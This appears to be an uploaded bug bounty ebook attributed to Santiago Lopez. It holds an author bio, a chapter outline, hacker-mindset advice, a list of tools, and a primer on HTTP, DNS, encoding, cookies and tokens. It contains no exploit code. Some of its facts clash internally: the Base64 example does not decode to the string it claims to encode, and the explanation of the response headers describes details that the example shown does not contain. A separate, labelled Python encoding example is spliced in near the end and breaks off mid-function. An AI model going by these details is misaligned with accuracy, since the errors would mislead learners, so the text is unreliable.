Bugbounty en

Uploaded by

davidlozadalink

SANTIAGO LOPEZ

MILLIONAIRE RECORDS
BUG BOUNTY CHANGES YOUR LIFE
ABOUT THE AUTHOR

Hi, I'm Santiago Lopez, an Argentinean hacker who, at the age of 19, achieved something that seemed impossible: to earn a million dollars by finding and reporting software vulnerabilities. It may sound like a Hollywood movie, but it is my reality.

My story began in my parents' humble basement, where an old computer and an unstable internet connection became my gateway to a fascinating world: the world of hacking. From a young age, I was drawn to technology and the challenges it presented. I would take apart electronics just to see how they worked and spend hours reading about programming and computer security.

When I was 16, I discovered the concept of "bug bounties," programs in which companies reward hackers who find vulnerabilities in their systems. I thought it was an amazing idea: I could use my skills to help improve internet security and earn money at the same time!

I started participating in bug bounty platforms, such as HackerOne, and soon discovered that I had a natural talent for finding vulnerabilities. I spent hours analyzing code, looking for patterns and trying different hacking techniques. It wasn't easy; there were many moments of frustration and sleepless nights, but the thrill of finding a critical bug and the satisfaction of knowing that I was helping to protect people kept me motivated.

Eventually, my efforts began to pay off. I found vulnerabilities in big-name companies like Verizon, Twitter and Automattic (the company behind WordPress). The rewards kept piling up, and in 2019, I reached the historic milestone of $1 million in earnings.

This achievement not only changed my life financially, but also opened doors to a world of opportunities. I've traveled the world, spoken at IT security events, and met amazing people who share my passion for technology and security.

Today, I still work as a white hat hacker, finding and reporting vulnerabilities to help companies protect their systems and their users. But I also want to share my experience and knowledge with others. That's why I wrote this book, to inspire other young people to follow their passions and prove that, with dedication and perseverance, they can achieve anything they set their minds to.

I hope my story motivates you to explore the world of bug bounty and discover the hacker in you - you never know where your passion might take you!
2 MILLIONAIRE RECORDS
FOREWORD

When I met Santiago Lopez, I was impressed by his passion for computer security and his innate ability to find vulnerabilities in software. But what really surprised me was his story: a young man from humble beginnings who, through his talent and dedication, managed to become a millionaire hacker.

Santiago is an inspiring example of how curiosity, perseverance and the desire to learn can open doors you never imagined. His story proves that you don't need a college degree or years of experience to succeed in the world of cybersecurity. What you do need is an inquisitive mind, an unwavering will and the ability to think outside the box.

In this book, Santiago shares his journey from his parents' basement to the top of the bug bounty world. He takes us through the ups and downs of his career, sharing his experiences, his lessons learned and his practical advice for those who want to follow in his footsteps.

But this book is much more than just a technical guide. It is an invitation to explore the mindset of a hacker, to see the digital world with new eyes and to discover the potential hidden in every line of code. Santiago shows us that hacking is not just a skill, but a way of thinking, a way of life.

Whether you are a student, an IT professional or just someone curious about the world of cybersecurity, this book will captivate and inspire you. Santiago will guide you through the fundamental concepts of bug bounty, teach you the most effective tools and techniques, and show you how to turn your passion into a successful career.

Get ready to embark on an exciting journey through the world of hacking from one of the most talented and successful hackers of our time. Open this book and discover the hacker in you!

Maurice Flores, CEO of TheCute LLC
INTRODUCTION

Get ready to dive into the exciting world of bug bounty, where ethical hackers become millionaires.

In this book, I will guide you through the basics of cybersecurity and reveal the techniques and strategies that allowed me to earn more than a million dollars by finding and reporting software vulnerabilities.

Together, we will explore different types of web vulnerabilities, from the most common ones, such as SQL injection and Cross-Site Scripting (XSS), to the most advanced ones, like exploit chains and deserialization attacks. You will learn to identify them, exploit them and, most importantly, prevent them.

I will teach you how to use the essential tools and techniques of ethical hacking, from vulnerability scanners to manual exploitation techniques. You will learn how to analyze source code, perform penetration tests, and use debugging tools to find and fix security errors.

But this book is not just about techniques and tools. We'll also explore a hacker's mindset, that insatiable curiosity and that passion for troubleshooting that drives us to look for vulnerabilities where others don't see them. You will learn to think like an attacker, anticipate their moves and build stronger defenses.

In addition, I will guide you through the world of bug bounty programs, where you can put your skills into practice and earn rewards for finding vulnerabilities. I'll show you how to find programs that suit your level of experience, how to communicate effectively with companies and how to build a successful career as a reward hunter.

Whether you're a curious beginner or an experienced IT security professional, this book will provide you with the tools and knowledge you need to become a bug bounty expert. Get ready to embark on an exciting adventure and discover the hacker you carry inside!

FOR WHOM IS THIS BOOK?

This book is written thinking about you, who are curious about the world of cybersecurity but have no prior experience. Maybe you've heard about the bug bounty and you're intrigued by the idea of making money by finding software vulnerabilities, but you don't know where to start. Or maybe you're a tech enthusiast looking for a way to use your skills to generate online revenue.

If you identify with any of these situations, this book is for you!

You don't need to be an IT expert to get started on the bug bounty. In fact, I myself started without any university degrees or work experience in the field. All you need is curiosity, a desire to learn and perseverance.

In this book, I will guide you step by step through the fundamentals of bug bounty, from the basics of web security to the most advanced techniques of ethical hacking. I will teach you how to find vulnerabilities, how to report them responsibly and how to maximize your profits.

It doesn't matter if you're a student, an employee or just someone looking for a new opportunity. The bug bounty is a flexible activity that you can do from anywhere in the world and at your own time.

With this book, you will discover that bug bounty is not only a way to make money, but also a way of learning, growing and making a difference in the digital world. I'll show you how to turn your passion for technology into an exciting and lucrative career.

So, if you're ready to embark on this adventure, open this book and discover the hacker you carry inside!

WHAT WILL YOU FIND IN THIS BOOK?
YOU WILL DISCOVER A COMPLETE GUIDE TO BECOMING A SUCCESSFUL BUG REWARD HUNTER.
Introduction 7
WHAT WILL YOU FIND IN THIS BOOK?

This book will guide you through an exciting journey through the world of bug bounty, from the basics to the most advanced techniques, so you can turn your passion for technology into a lucrative and rewarding career.

Part I: Bug Bounty Fundamentals

• Chapter 1: Introduction: Discover the story of Santiago López, the millionaire hacker, and how the bug bounty can change your life. Learn what bug bounty is and why it is a unique opportunity to make money doing what you love.
• Chapter 2: Hacker Mentality: Immerse yourself in a hacker's mind and learn to think creatively and find vulnerabilities that others overlook. Develop the critical thinking and problem-solving skills that will turn you into a successful reward hunter.
• Chapter 3: Essential Tools and Techniques: Get acquainted with the most important tools and techniques used by reward hunters, from vulnerability scanners to manual exploitation techniques. Learn how to use them effectively to find and report vulnerabilities.

Part II: Web Vulnerabilities

• Chapter 4: SQL Injection: Learn how attackers can inject malicious SQL code into a web application and how to protect yourself against this type of attack.
• Chapter 5: Cross-Site Scripting (XSS): Explore the different types of XSS (reflected, stored, and DOM-based) and learn how to prevent them. Learn how attackers can use XSS to steal data or take control of user accounts.
• Chapter 6: Open Redirects: Learn to identify different types of Open Redirects, from the simplest to the most sophisticated, and discover how attackers can hide their intentions behind seemingly harmless links.
• Chapter 7: Clickjacking: The art of deceiving your clicks. You will learn how attackers manipulate web interfaces to get you to click where they want, and how you can protect yourself from this invisible threat.
• Chapter 8: Cross-Site Request Forgery (CSRF): Learn how attackers can trick users into performing unwanted actions in a web application and how to protect yourself against CSRF.
• Chapter 9: IDOR: The negligence that can be costly. You will learn how hackers take advantage of data access errors to see information they should not, and how to prevent this from happening in your applications.
• Chapter 10: Race Conditions: When speed becomes a problem. You will learn how hackers exploit time and synchronization to damage applications, and how to design your systems to prevent these attacks.
• Chapter 11: SSRF: The server as involuntary accomplice. You will learn how hackers manipulate server requests to access internal or external resources, and how to shield your applications against this type of attack.
• Chapter 12: Insecure Deserialization: The resurgence of malicious objects. You will learn how hackers manipulate serialized data to run unauthorized code on your server, and how to protect your applications from this threat.
• Chapter 13: XXE: The back door in your XML files. You will learn how hackers exploit XML processing to access files and system resources, and how to secure your applications against this type of attack.
• Chapter 14: Template Injection: When templates become weapons. You will learn how hackers manipulate web templates to run malicious code on your server, and how to protect your applications from this dangerous vulnerability.
• Chapter 15: Application Logic Errors: The software works, but not as it should. You will learn to identify hidden bugs in the logic of applications that can be exploited by attackers, and how to design more secure and robust software.
• Chapter 16: Broken Access Control (BAC): When doors are left wide open. You will learn how attackers take advantage of access control bugs to access sensitive information or perform unauthorized actions, and how to secure your apps to avoid it.
• Chapter 17: Directory Traversal: Escaping Directory Prison. You will learn how hackers move freely through your server's file system, accessing sensitive information, and how to prevent them from escaping permitted limits.
• Chapter 18: RCE: Remote control of your server. You will learn how hackers take full control of your server, running their own code to steal data or cause damage, and how to protect yourself from this critical threat.
• Chapter 19: Same-Origin Policy Bugs: When web boundaries are blurred. You will learn how hackers bypass security restrictions between websites to steal data or undertake unauthorized actions, and how to strengthen your defenses to keep your data safe.
• Chapter 20: SSO: A master key with hidden risks. You will learn how hackers can exploit vulnerabilities in single sign-on to access multiple accounts and data, and how to protect your systems from this threat.
• Chapter 21: Information Disclosure: The Secrets Revealed. You will learn how hackers uncover sensitive information that should not be public, from user data to technical details of the application, and how to prevent your systems from leaking valuable information.

Part III: Beyond Technique

• Chapter 22: Bug Bounty Programs: Immerse yourself in the world of bug bounty programs and learn how to find and participate in them. Discover tips and tricks to maximize your earnings and build a successful career as a reward hunter.
• Chapter 23: Responsible Communication and Disclosure: Learn to report vulnerabilities responsibly to companies and how to work with them to solve problems. Discover the importance of responsible disclosure and how it can benefit both hackers and companies.
• Chapter 24: Building a Bug Bounty Career: Get practical tips from Santiago López on how to turn your passion for security into a successful career. Learn how to develop your skills, build your reputation and find opportunities in the job market.
• Chapter 25: The Future of Bug Bounty: Explore emerging trends in the world of bug bounty and discover how you can prepare for the future of this exciting industry.

Part IV: Getting to Work

• Chapter 26: Choosing a Bug Bounty Program: You will learn how to select the bug bounty programs that best suit your skills, goals and preferences, maximizing your chances of success and reward.
• Chapter 27: History of the Industry: You will learn about the evolution of this practice from its beginnings to the present. You will learn how the early bug bounty programs laid the foundations for today's industry, and how it has grown and professionalized over time.
• Chapter 28: Asset Types: You will be able to understand the different types of systems, applications and platforms that become targets of bug bounty programs.
• Chapter 29: Platforms: You will learn about the major platforms that connect security researchers with companies seeking to identify security issues in their systems.
• Chapter 30: Scope, Payments and Response Times: You will learn how to interpret the terms and conditions of bug bounty programs, what vulnerabilities qualify for reward, how payments are made, and how long you can wait for a response to your reports.
• Chapter 31: Private Programs: You will learn about bug bounty programs that are not open to the general public, but are exclusive to a selected group of security researchers.
• Chapter 32: The Right Program: You will learn to define your goals and preferences as a bug bounty researcher, and to use that information to select the programs that best align with them.
• Chapter 33: A Good Report: You will learn to communicate your findings in a clear, concise and effective way.
• Chapter 34: Build a Relationship: You will learn how to build strong and lasting relationships with companies that offer bug bounty programs.
• Chapter 35: Why Are You Failing?: You will learn to identify and overcome the most common obstacles facing bug bounty researchers. Discover how to analyze your own errors, learn from them, and improve your vulnerability search and reporting strategies.
• Chapter 36: What to Do When You're Stuck?: You will learn how to overcome creative and technical blocks that may arise during the search for vulnerabilities.

With this book, you will have all the tools you need to become a bug bounty expert and start making money by protecting companies and users from cybercriminals. Prepare for an exciting and challenging adventure!

HAPPY HACKING!
YOU WILL FIND A FINAL MESSAGE OF ENCOURAGEMENT AND MOTIVATION TO EMBARK ON YOUR ADVENTURE IN THE WORLD OF BUG BOUNTY.
HAPPY HACKING!

Now that you have in your hands the tools and knowledge that led me to earn a million dollars, it's your turn to go out into the world and leave your mark in the bug bounty universe.

If you commit to learning, practicing and applying the strategies I have shared with you, I assure you that the chances of transforming your life and achieving financial success are enormous. Bug bounty is a growing industry, and companies are willing to pay generously to protect their systems.

But remember, power entails a great deal of responsibility. The knowledge you have acquired in this book can be used for good or for evil. I urge you to use your skills ethically and responsibly, always respecting the privacy and safety of others.

The bug bounty is a community of people passionate about technology and security. Join forums, participate in events and share your knowledge with others. Together, we can make the Internet a safer place for everyone.

So go ahead, get out there and start your adventure! I'm sure you'll achieve great things.

Important reminder: The content of this book is intended solely for educational and research purposes. The misuse of the information presented here is illegal and may have serious legal consequences. Hack responsibly!
CHAPTER ONE

BUG BOUNTY FUNDAMENTALS
SANTI'S PATH: My Way to the Million Dollars (and How You Can Do the Same)

Hi, I'm Santiago López, and they call me the "millionaire hacker." Not because I robbed a bank (that would be illegal!), but because I earned more than a million dollars by finding and reporting software vulnerabilities through bug bounty programs.

At the age of 19, I reached a historic milestone: I became the world's first millionaire hacker. This milestone not only marked a highlight in my personal career, but also highlighted the importance of bug bounty as a key tool for cybersecurity.

Does that sound too good to be true? Believe me, I know it looks like it. When I started in this world, I was a curious teenager with an old computer and a slow internet connection. I never imagined that my passion for technology and troubleshooting would lead me to travel around the world, meet amazing people and, yes, make a fortune.

But here I am, and I want to share my story with you. I want to show you that bug bounty is not just a way to make a living, but an exciting adventure that allows you to use your skills to make the digital world a safer place.

In this book, I'll take you by the hand through my journey. I'll tell you how I discovered the bug bounty, how I learned the tools and techniques needed to find vulnerabilities, and how I overcame the challenges and obstacles I encountered along the way.

But this is not just an autobiography. My goal is to give you the tools and knowledge you need to follow in my footsteps. I'll teach you how to think like a hacker, how to find vulnerabilities that others overlook, and how to effectively communicate your findings to companies.

Whether you are a student, a computer professional or just a technology enthusiast, this book is for you. If you have curiosity, perseverance and a passion for troubleshooting, you can become a successful reward hunter.

Are you ready to embark on this adventure with me? Let's move on to the next page!
I still remember how I found my first bug. At that time, I spent a lot of time trying to hack small companies that didn't offer a reward for bugs in their software. My first target was eBay; this company was launching its new bug bounty program and allowed you to report vulnerabilities by email. You would not receive a reward, but you would be presented with a "thank you" page once you reported a valid bug.

My first bug was a very simple CSRF that allowed you to edit your eBay account information through a link. As I said, I did not receive any reward, but I had the opportunity to show my parents my achievement, which I love to this day.

Welcome to my world. My main goal today is to show you how I, Santiago Lopez, transformed my passion for technology and cybersecurity into an extraordinary journey that led to earning over a million dollars at the age of 19.

As someone who started from humble beginnings, my goal with this book is to demystify the bug bounty process and share the strategies, techniques and mentality that helped me succeed. Whether you're a newcomer curious about ethical hacking or an experienced professional looking to perfect your skills, this book provides valuable insights and practical tips to guide you along your path.

On the following pages, you will find a comprehensive guide that covers everything from the basics of bug bounty to advanced techniques for identifying and reporting vulnerabilities. I will guide you through the essential tools, methodologies and platforms that have been crucial to my success. In addition, I will share anecdotes and personal experiences that highlight the challenges and triumphs I have faced along the way.

One of the unique aspects of this book is its emphasis on the holistic approach to becoming a successful ethical hacker. It's not just about technical skills; it's also about developing the right mindset, building effective habits, and understanding the motivations that drive true success. I believe that anyone, regardless of their origin or their starting point, can achieve extraordinary results with the right direction and determination.

This book is divided into several modules, each designed to build on the previous one, ensuring a structured and comprehensive learning experience. You will learn how to navigate bug bounty platforms like HackerOne, master the art of vulnerability hunting, and understand the nuances of reporting bugs effectively. At the end of this book, you will have the knowledge and confidence to embark on your own journey into the bug bounty ecosystem.

As you read these chapters, I encourage you to approach the material with an open mind and a willingness to learn. The world of bug bounty is dynamic and always evolving, offering endless opportunities for those willing to take advantage of them.

Thank you for joining me on this journey. I hope this book will not only equip you with the skills to succeed in bug bounty, but also inspire you to pursue your passions and realize your full potential. Let's dive into the exciting world of ethical hacking and discover how you too can turn your skills into meaningful achievements.

MILLIONAIRE HACKER MENTALITY
YOU WILL DISCOVER THE KEYS TO DEVELOPING A MINDSET FOCUSED ON GROWTH, PERSEVERANCE AND CREATIVE PROBLEM SOLVING.


MILLIONAIRE HACKER MENTALITY

You're not born a hacker, you're made. It is not a question of having a genius-level IQ, but of cultivating a particular way of thinking, a mindset that questions, explores, and seeks creative solutions to complex problems. In this chapter, I'll invite you to immerse yourself in a hacker's mind, see the digital world through a different lens, and discover how this unique perspective can turn you into a successful reward hunter.

What's the Hacker Mentality?

The hacker mindset is not about breaking things for fun or causing harm. It's about curiosity, ingenuity, and an inexhaustible passion for understanding how things work. Hackers see the world as a giant puzzle, full of secrets to discover and challenges to overcome.

This mentality is based on several key principles:

• Insatiable Curiosity: Hackers have an insatiable thirst for knowledge. They want to understand how things work, why they work that way, and how they could work otherwise. This curiosity drives them to constantly explore, experiment and learn.
• Lateral Thinking: Hackers are not limited to following established rules. They look for creative and unusual solutions to problems. They are not afraid to question the status quo and propose new ideas.
• Persistence: Hackers don't give up easily. When they face a challenge, they keep trying until they find a solution. They understand that failure is part of the learning process and use it as an opportunity to improve.
• Open Mentality: Hackers are open to new ideas and perspectives. They do not cling to their own beliefs and are willing to change their minds if convincing evidence is presented to them.
• Collaboration: Hackers believe in the power of the community. They share their knowledge and experience with others, and learn from others. They understand that together they can achieve more than alone.
ESSENTIAL TOOLS AND TECHNIQUES
YOU WILL DISCOVER THE FUNDAMENTAL TOOLS AND METHODOLOGIES THAT BUG BOUNTY EXPERTS USE TO FIND VULNERABILITIES EFFICIENTLY.
How to Develop a Hacker Mentality

Developing a hacker mindset is not something that happens overnight. It requires time, effort and dedication. But with practice, you can train your mind to think like a hacker. Here are some tips to get started:

• Question everything: Don't accept things as they are. Ask yourself why things work in a certain way and if they could work otherwise.
• Experiment: Don't be afraid to try new things and experiment with different approaches. Trial and error is an important part of the learning process.
• Learn from others: Join online hacking communities, attend conferences and workshops, and read books and articles about cybersecurity.
• Share your knowledge: Help other hackers and learn from their experiences.
• Don't give up: Persistence is key. Don't be discouraged by failures; learn from them and move on.

The Hacker Mentality on Bug Bounty

The hacker mindset is essential for success in the bug bounty. It allows you to view web applications and systems from an attacker's perspective, identify vulnerabilities that others overlook, and develop creative exploits.

By adopting this mindset, you will become a valuable asset for any bug bounty program. You can help improve the security of their products and services, protect users from cybercriminals and, of course, earn significant rewards for your efforts.

The hacker mindset is a powerful tool that can open the doors to a world of opportunities. Whether you want to become a professional reward hunter, improve your cybersecurity skills, or simply better understand how the digital world works, cultivating this mentality will give you an invaluable advantage.

So, are you ready to start thinking like a hacker? The journey begins now!


ESSENTIAL TOOLS AND TECHNIQUES

A good hacker is like a detective: he needs the right tools to solve the case. In the world of bug bounty, these tools range from sophisticated automated scanners to the most refined manual skills. In this chapter, I will introduce you to the essential arsenal that every reward hunter must master to successfully find and exploit vulnerabilities.

Vulnerability Scanners

Vulnerability scanners are automated tools that analyze web applications and systems for potential vulnerabilities. They're like digital bloodhounds that sniff through code in search of patterns that indicate the presence of known vulnerabilities.

Some of the most popular and effective scanners include:

• Burp Suite: A complete set of tools to test the security of web applications. It includes an intercepting proxy, a vulnerability scanner, a request repeater and many other useful tools.
• OWASP ZAP: An open source vulnerability scanner specifically designed to find security issues in web applications.
• Nessus: A network vulnerability scanner that can identify a wide range of vulnerabilities in systems and applications.
• Nikto: An open source web vulnerability scanner that searches for a variety of common issues, such as configuration errors, default files and directories, and known vulnerabilities.

While vulnerability scanners are a valuable tool, it is important to remember that they are not infallible. More subtle or complex vulnerabilities can be overlooked, so it is crucial to complement their use with manual testing.
Manual Exploitation Techniques: The Art of Hacking

Manual exploitation techniques are the true heart of hacking. They involve using technical skills and knowledge to manipulate a web application or system and exploit its vulnerabilities.

HOW THE INTERNET WORKS
YOU WILL LEARN THE BASIC FUNDAMENTALS OF THE GLOBAL NETWORK, FROM COMMUNICATION PROTOCOLS TO THE STRUCTURE OF IP ADDRESSES AND DOMAINS.

Some of the most common techniques include:

• Code Injection: Code injection is a technique in which an attacker inserts malicious code into a web application, which is then run by the application. There are different types of code injection, such as SQL, command, and template injections.
• Fuzzing: Fuzzing is a technique that consists of sending random or unexpected data to an application to see how it reacts. If the application crashes, hangs or behaves unexpectedly, it can be a sign of a vulnerability.
• Social Engineering: Social engineering is the art of manipulating people into disclosing confidential information or taking actions that benefit the attacker. In the context of bug bounty, social engineering can be used to gain access to restricted systems or to collect information about vulnerabilities; note, however, that many programs explicitly exclude social engineering from scope, so always check the program rules first.
• Source Code Analysis: Source code analysis involves examining the code of an application to identify vulnerabilities. This technique requires a deep knowledge of programming languages and security practices.
Other Essential Tools

In addition to vulnerability scanners and manual exploitation techniques, there are other tools that every reward hunter should have in his arsenal:

• Intercepting Proxy: An intercepting proxy, such as Burp Suite, allows you to intercept and modify traffic between your browser and the web server. This is useful for analysing HTTP requests and responses, modifying parameters, and testing different payloads.
• Web Inspector: A web inspector, such as the Chrome or Firefox developer tools, allows you to examine the HTML, CSS, and JavaScript code of a web page, as well as network requests and responses. This is useful to identify client-side vulnerabilities, such as Cross-Site Scripting (XSS).
• Command Line Tools: Command line tools, such as curl, wget, and nmap, are essential for conducting security testing from the terminal.
• Virtual Machine: A virtual machine allows you to create an isolated environment to test web applications and systems without compromising your main system.
1.1 - HOW INTERNET WORKS #1.1

Let's take a moment to learn how the Internet works before we go hunting bugs. Exploiting the weaknesses of this technology is at the heart of searching for web vulnerabilities, so experienced hackers should be well versed in it. You can skip ahead to my explanation of Internet security safeguards if you are already familiar with these procedures.

A good starting point is to wonder what happens in your browser when you type www.google.com. In other words, how does your browser determine how to navigate from a domain name like google.com to the desired web page? Let's investigate it.

Client-Server Model

Clients and servers are the two types of equipment that make up the Internet. Resources and services are requested by clients and supplied by servers. Your browser works like a client that requests a web page from a web server when you visit a web site. The browser then receives the web page from the server.

A web page is a set of files or resources served by the web server. For example, the server will send to your browser at least a text file written in HTML (Hypertext Markup Language), which tells your browser what to display.

To enhance its appearance, most web pages now incorporate cascading style sheets (CSS). Web pages can also include JavaScript (JS) files, which allow websites to respond to user input and animate the page without the need for a server. JavaScript, for example, can validate user input on the client side before transmitting it to the server, and resize images as users move around the page.

Last but not least, embedded features, such as images and videos, can appear in your browser. The web page you are viewing is the result of the combination of these features in your browser.

Servers offer users more than just access to web pages. Applications can request data from other systems through web APIs. This enables applications to communicate with each other and exchange resources and data in a managed way. Through Twitter APIs, for example, other websites can send requests to Twitter servers to receive information such as lists of public tweets and the people who have written them. Beyond this, many other features of the Internet are fed by APIs; we will talk about them and their security issues.

Domain Name System

How do other browsers and yours know where to look for these resources? Each device connected to the Internet has its own Internet Protocol (IP) address that other devices can use to locate it. However, IP addresses are composed of characters and numbers that are difficult to remember. The IPv4 address format, for example, is older and looks like this: 164.72.240.213. IPv6, the latest version, seems rather more intricate: fd2f:0c63:bc9c::/48.

The Domain Name System (DNS) is useful in this situation. It converts domain names to IP addresses; the DNS server acts as the Internet equivalent of a phone book.
Internet ports

Your browser will try to establish a port-based connection to the IP address once it has determined the appropriate address. On devices, a port is a logical division that designates a specific network service. Port numbers, which can range from 0 to 65,535, are used to identify ports.

Ports can be used by a server to provide multiple services to the Internet simultaneously. Port numbers also allow the server to effectively transfer incoming messages from the Internet to the appropriate service for processing, as there are protocols for the traffic received on specific ports. For example, the web server recognizes that a client connecting to port 80 wants to access its web services.

For HTTPS, the encrypted version of HTTP, we use port 443, while by default port 80 is used for HTTP.

HTTP requests and responses

Once the connection is established, the browser and the server use the Hypertext Transfer Protocol (HTTP) to communicate. HTTP is a set of guidelines that describe the format and meaning of messages sent over the Internet, as well as the information exchange protocols that web servers and clients should follow.

The browser sends an HTTP request to a server whenever you want to communicate with it. The two most popular forms of HTTP requests are GET and POST, although there are also other varieties. POST requests send data to the server, while GET requests usually retrieve data from it. Other popular HTTP methods are PUT, which is used for updating resources, DELETE, which is used to remove resources, and OPTIONS, which is used to request the permitted HTTP methods for a specific URL.

This is an example of a GET request that asks the server for the google.com home page.

-----------------------------------------------------------
GET / HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0
Accept: text/html, application/xhtml+xml, application/xml
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Connection: close
-----------------------------------------------------------

Since you will encounter many of these requests throughout this book, we will review their format. Each HTTP request consists of a request line, request headers and an optional request body. The request line and headers are all that is present in the previous example.

The first line of an HTTP request is known as the request line. It details the request method, the requested URL and the HTTP version used. Here it can be noted that the client is using HTTP version 1.1 to send a GET request to the homepage of www.google.com.

The headers of the HTTP request make up the remaining lines. They are used to provide the server with more details about the request. This allows the server to customize the results for the client. The request's host name is specified in the Host header in the previous example. The operating system and version of the requesting software, including the user's web browser, are listed in the User-Agent header. The Accept, Accept-Language, and Accept-Encoding headers inform the server of the formats the client accepts for the reply. In addition, the Connection header tells the server whether or not to keep the network connection open once the server has responded.

Some more standard headers may appear in requests. Cookies are sent from the client to the server through the Cookie header. The address of the previous web page that linked to the current page is specified in the Referer header. Additionally, credentials for user authentication on a server are included in the Authorization header. The server will attempt to satisfy the request as soon as it is received. Through HTTP responses, the server will return all the resources needed to create
your web page. An HTTP response has several components: the body of the HTTP response, which is the actual web content you have requested; an HTTP status code to show whether the request has been performed correctly; and HTTP headers, which carry the authentication information, content format, and security policies that browsers and servers use to communicate with each other. The content of the website may consist of graphics, JavaScript code, CSS style sheets, HTML code, etc.

Here is an example of an HTTP response:

HTTP/1.1 200 OK
Date: Mon, 27 Jul 2009 12:28:53 GMT
Server: Apache/2.2.14 (Win32)
Last-Modified: Wed, 22 Jul 2009 19:15:56 GMT
Content-Length: 88
Content-Type: text/html
Connection: Closed

<html> <body> <h1>Hello, World!</h1> </body> </html>

Note the 200 OK message on the first line.

A successful request is indicated by an HTTP status code in the 200 range. A status code in the 300 range denotes a page redirection, while a code in the 400 range denotes an error from the client, such as a request for a page that does not exist. The 500 range indicates an error that has occurred on the server.

As a bug hunter, you should always keep an eye on these status codes, as they provide valuable information about server functionality. A 403 status code, for example, indicates that you are not allowed to use the resource. This could imply that, if you can get past the access restrictions, there is sensitive information buried in the website.

HTTP response headers are the lines that follow the status line, each split by a colon (:). They allow the server to provide the client with more information about the response. In this case, it is evident that the response was received on Tuesday, August 31, 2021, at 17:38:14 GMT. The file type of the response body is specified by the Content-Type header. In this case, the content type of the page is text/html. Google Web Server (gws) is the server version, and 190,532 bytes is the content length. The format, language and security restrictions of the material are usually specified in additional response headers.

In addition to these, you may encounter some other typical response headers. To set a cookie, the server sends the Set-Cookie header to the client. The URL to which the page should be redirected is indicated in the Location header. The origins that are allowed to access the content of the page are indicated in the Access-Control-Allow-Origin header.

The X-Frame-Options header indicates whether the page can be loaded within an iframe, while Content-Security-Policy regulates the sources from which the browser may load resources. The body of the response is the data that follows the blank line. It includes the HTML and JavaScript code that makes up the actual content of the page. Your browser will render it all for you once it has all the data needed to create the web page.

Internet security checks

Now that you have acquired a general understanding of how information is shared online, we will discuss some essential security measures that keep hackers out. First you need to understand how these controls work, because finding bugs often requires you to design inventive ways around them.

Content Encoding

It is not always the case that data sent through HTTP requests and responses is sent as plain text. Websites often use various encoding techniques to protect their messages from data corruption.

Binary data can be successfully transferred between machines with different levels of support for different types of content through data encoding. Common characters that are not used as control characters in Internet protocols are used for encoding. So you can be sure that your data will reach its destination without damage when encoding information using standard encoding schemes. On the other hand, if you transfer your data in its original format, Internet protocols may misread specific characters in the message, which could cause data corruption.

Base64 encoding is one of the most common ways to encode data. It is often used to carry images and encrypted information within web messages. This is the base64 encoded version of the "Content Encoding" string:

------------
VEhJUyBJUyBBIFRFU1Q=
------------
The character set used in Base64 encoding consists of the following: the uppercase letters A to Z, the lowercase letters a to z, the digits 0 to 9, the symbols + and /, and finally the = for padding. A modified variant of base64 called base64url encoding is used for URL formatting. It is similar to base64, but without padding and using a different set of non-alphanumeric characters.

URL encoding

URLs can only be sent over the Internet using the ASCII character set. If a URL contains characters outside the ASCII character set, the URL must be converted.

• URL encoding converts non-ASCII characters into a format that can be transmitted over the Internet.
• URL encoding replaces non-ASCII characters with a "%" followed by hexadecimal digits.
• URLs cannot contain spaces. URL encoding normally replaces a space with a plus sign (+), or %20.

URL-encoded equivalent using a URL calculator such as URL Decode and Encode (https://www.urlencoder.org/).

HTTP cookies and session management

Why is it that every time you close the email tab, you don't need to log in again? It is because your session is remembered by the website. By using session management, the server can respond to multiple requests from the same user without making them log in again.

Each user accessing a web site creates and maintains a session, and this process is initiated when you log in. Your browser will receive an associated session ID from the server, which acts as an identification document.

Usually, the session ID is a long random string that is difficult to guess. The server logs you out and deletes the session ID when you exit.

Cookies are used by most websites to transmit session data in HTTP requests. Web servers send small data files known as HTTP cookies to your browser. The server establishes a session for you when you connect, and sends the session ID as a cookie to your browser. Your browser saves cookies and uses them for each request you make to the same server. This is how the server recognizes you! The server will track the cookie created during the session and use it to verify your identity. Ultimately, the server will disable the session cookie when you log out, making it unusable. The server will generate a new session and an accompanying session cookie for you the next time you connect.

Token-based authentication

Token-based authentication is a security method used to verify a user's identity on websites, applications and APIs. It works like a digital key that grants access after a login. Here is a breakdown:

Process:

• Login: Enter your username and password on a website or application.
• Verification: The system verifies your credentials and, if correct, generates a unique token (a digital code).
• Granting access: The token is sent back to your device (computer, phone, etc.).
• Subsequent access: When you return to the same website or application, you do not have to re-enter your password. Instead, your device sends the token to the system.
• Validation: The system verifies the validity of the token (making sure it has not expired or been tampered with) and grants you access.

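As an added example (not the book's own code), here are the Base64 alphabet, the base64url variant and the percent-encoding rules from the Content Encoding and URL encoding sections above, implemented by hand so the padding and "%XX" mechanics are visible; the sample inputs are constructed, and each codec is cross-checked against Python's standard library.

```python
"""Hand-rolled Base64, base64url and URL (percent) encoding.

Added example, not from the book: it implements the alphabet and padding
rules the text describes and cross-checks them against the standard library.
"""
import base64
import urllib.parse

# The Base64 alphabet exactly as the text lists it: A-Z, a-z, 0-9, + and /.
B64_ALPHABET = ("ABCDEFGHIJKLMNOPQRSTUVWXYZ"
                "abcdefghijklmnopqrstuvwxyz"
                "0123456789+/")
PAD = "="


def b64_encode(data: bytes, urlsafe: bool = False) -> str:
    """Encode bytes as Base64, or as base64url when urlsafe=True.

    Every 3 input bytes (24 bits) become 4 symbols of 6 bits. A short final
    group is zero-filled and marked with '=' padding; base64url swaps '+' '/'
    for '-' '_' and drops the padding, which is what makes it URL-safe.
    """
    out = []
    for i in range(0, len(data), 3):
        chunk = data[i:i + 3]
        n = len(chunk)
        bits = int.from_bytes(chunk + b"\x00" * (3 - n), "big")
        syms = [B64_ALPHABET[(bits >> s) & 0x3F] for s in (18, 12, 6, 0)]
        keep = n + 1          # 1 byte -> 2 symbols, 2 bytes -> 3, 3 bytes -> 4
        out.append("".join(syms[:keep]) + PAD * (4 - keep))
    encoded = "".join(out)
    if urlsafe:
        encoded = encoded.replace("+", "-").replace("/", "_").rstrip(PAD)
    return encoded


def b64_decode(text: str) -> bytes:
    """Decode Base64 or base64url; reject symbols outside either alphabet."""
    text = text.replace("-", "+").replace("_", "/").rstrip(PAD)
    if any(c not in B64_ALPHABET for c in text):
        raise ValueError("symbol outside the Base64 alphabet")
    if len(text) % 4 == 1:
        raise ValueError("invalid length: 6 bits cannot carry a whole byte")
    out = bytearray()
    for i in range(0, len(text), 4):
        group = text[i:i + 4]
        bits = 0
        for c in group:
            bits = (bits << 6) | B64_ALPHABET.index(c)
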